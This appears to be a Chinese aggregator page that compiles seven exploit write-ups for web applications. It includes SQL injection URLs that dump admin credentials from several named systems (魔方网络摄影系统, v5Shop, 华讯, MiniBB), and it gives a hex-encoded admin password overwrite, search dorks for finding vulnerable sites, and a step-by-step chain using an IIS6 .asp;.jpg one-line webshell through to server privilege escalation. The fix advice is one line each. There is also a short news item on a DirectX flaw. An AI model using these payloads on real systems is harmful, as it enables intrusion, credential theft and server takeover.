“kyco珺”通过精心收集,向本站投稿了7篇魔方网络摄影系统注入漏洞及利用和修复,以下是小编收集整理后的魔方网络摄影系统注入漏洞及利用和修复,仅供参考,欢迎大家阅读。
- 目录
篇1:魔方网络摄影系统注入漏洞及利用和修复
魔方网络摄影系统
注入点: /news.php?action=detail&id=[SQLi]
利用方法,第一步通过注入点获取管理员账号和密码,密码居然是明文的
第二步,后台地址为/admin.php,进去管理后台试图拿webshell
第三步,通过iis6解析漏洞,上传.asp;.jpg一句话木马
第四步,菜刀连接一句话木马
第五步,进一步提权,拿下服务器,。。
--------------------------------------------------------------------------------
应该是统一建站的 连mysql 密码都是明文 无语啊.... 估计见一个死一个 不是密码为空 就是明文getshell 有时间 看看有没有其他的包含漏洞cgi过滤 太恶心了
其实cgi 嘛你懂的像这个 /data/attachment/1.php;1.jpg
不一定有效
FastCGI Error
The FastCGI Handler was unable to process the request.
Error Details:
Could not find entry for “jpg” on site 236134254 in [Types] section.
Error Number: 1413 (0x80070585).
Error Description: ÎTD§Ë÷òy¡£
HTTP Error 500 - Server Error.
Internet Information Services (IIS)
提供修复方案:
过滤news.php页面参数输入,
修复iis6解析漏洞
篇2:魔方网络摄影系统注入漏洞及利用漏洞预警
魔方网络摄影系统
注入点:/news.php?action=detail&id=[SQLi]
利用方法,第一步通过注入点获取管理员账号和密码,密码居然是明文的
第二步,后台地址为/admin.php,进去管理后台试图拿webshell
第三步,通过iis6解析漏洞,上传.asp;.jpg一句话木马
第四步, 直接连接一句话 -_,
篇3:v5Shop注入漏洞及修复
/commond.aspx?id=1869
没办法union,只能让它暴错了
暴管理员用户名:/commond.aspx?id=1869 and 1=(select top 1 [name] from web_admin)--
暴管理员密 码:/commond.aspx?id=1869 and 1=(select top 1 [pass] from web_admin)--
过滤了单引号.只能把字符串转化成16进制的了
更新管理员密码:update web_admin set
pass=0x31004200460041004500370042004500410043004600350036003200330041003200430042
004400450037004400450041003600340042003700430037004300
weblogin/System_Config_Operate.aspx
后台上传水印.可以直接上传大马.
拿webshell
切记.千万不要传ASPX的马......不然不会成功的.
你可以先传ASP的马..再传ASPX马.
马的路径为:uploadFile/Picture/木马.asp
关键字:services.aspxid=
inurl:scoreindex.aspx
默认后台地址:weblogin/Login.aspx
/weblogin/index.aspx
复制这段代码 域名+代码
cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 --
更新管理员密码:update web_admin setpass=0x310042004600410045003700420045004100430046003500360032003300410032004300420044
00450037004400450041003600340042003700430037004300
weblogin/System_Config_Operate.aspx
后台上传水印.可以直接上传大马.
后台拿webshell
切记.不要传ASPX的马......不然不会成功的.
你可以先传ASP的马..再传ASPX马.
马的路径为:uploadFile/Picture/木马.asp
文章作者:黑面小窝
修复:对照过滤
篇4:DirectX漏洞被利用 马上修复系统
微软及其他公司的安全专家担心,继上周“冲击波”蠕虫病毒通过互联网进行大肆传播之后,最近在DirectX中发现的安全漏洞可能会引发更严重的问题,
微软似乎在“冲击波”的袭击中生存了下来,但现在它更积极地鼓励Windows用户修复软件中潜在的、不同的、更危险的安全漏洞。
尽管大多数公司已安装了应对“冲击波”的补丁,但另一个安全漏洞可能会被利用,再现上周阴影。
微软曾于今年7月23日在它的 上发出安全公告称,各版本的DirectX中均存在着一个“危急”的安全漏洞。
微软表示,该漏洞是由DirectX中一个依赖于被称为“quartz.dll”库文件的组件引起的。“quartz.dll”是用来来播放midi文件的,它应用于微软的众多程序中,包括Internet Explorer等,
一个经过特殊设计的midi文件可能会导致缓冲区溢出错误或使攻击者取得对受害用户系统的控制权,从而对受害用户的系统造成损害或利用受害用户的系统制造类似于“冲击波”的另一轮袭击。
TruSecure安全公司的首席科学家Russ Cooper预计,利用Windows另一安全漏洞的蠕虫或病毒将会在短期内出现。他说:“我们最担心的是DirectX中的漏洞。”他认为由于只有极少数用户针对该漏洞进行了修复,这一安全隐患目前仍是广泛存在的。
Cooper相信,DirectX中的漏洞有可能被类似于在“冲击波”中使用的方法所利用。
点击这里查看微软第MS03-030号安全。
点击阅读更多学院相关文章>>
分享到
篇5:华讯网络管理系统注入漏洞利用漏洞预警
华讯网络管理系统存在SQL注入,可获取管理员用户密码信息,
关键字:inurl:chk_case.asp
漏洞测试:
www.site.com/chk_case.asp?ID=673%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,userpassword,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41%20from%20admin
默认后台:
www.site.com/admin/
篇6:simplelog v1.3.1 注入漏洞及修复
Simple-Log是基于PHP+MySQL的开源免费博客系统,系统轻巧运行速度飞快并具有很好的可扩展性.
程序下载地址:html“>/ym/201104/27199.html
----------------------------------------------
刚买到vps,打算装个blog系统,看到simple-log比较简洁,就下了最新的装了,,
simplelog v1.3.1 注入漏洞及修复
,
谁知道,偶刚装好,到前台看到搜索就搜了下,没想到真有洞,urldecode惹的祸。
试了下,真可以爆啊,无语了。
再上一张图吧,数据依然可以爆掉。
作者:tojen
篇7:MiniBB 2.5 SQL注入漏洞及修复
MiniBB是一个袖珍型开源PHP论坛软件,MiniBB 2.5中的index.php文件存在SQL注入漏洞,可能导致敏感信息泄露,
[+]info:
~~~~~~~~~
MiniBB 2.5 SQL Injection Vulnerability
Product: MiniBB
Vendor: MiniBB.com ( www.minibb.com/ )
Vulnerable Version: 2.5
Vendor Notification: 21 October 2010
Vulnerability Type: SQL Injection
[+]poc:
~~~~~~~~~
POST /index.php?action=registernew HTTP/1.1
Host: [host]
Referer: [host]/index.php?action=registernew
Content-Type: application/x-www-form-urlencoded
Content-Length: 225
action=register&login=pentest&passwd=pentest&passwd2=pentest&email=pentest%40pentest.com&icq=1%5C%5C&occupation=2%5C%5C&from=3%5C%5C&interest=4%5C%5C&user_viewemail=5%5C%5C&user_sorttopics=6%5C%5C&language=7%5C%5C&login=Login
[+]Reference:
~~~~~~~~~
www.htbridge.ch/advisory/sql_injection_in_minibb.html
www.hack50.com修复:index.php过滤
★ Andys PHP Knowledgebase 0.95.4 SQL注入漏洞及修复
★ Shopv8 商城系统 v12.07 Cookies 注入漏洞漏洞预警
★ 永久网络个人音乐盒LajoxBox v1.1上传漏洞利用漏洞预警
魔方网络摄影系统注入漏洞及利用和修复(集锦7篇)




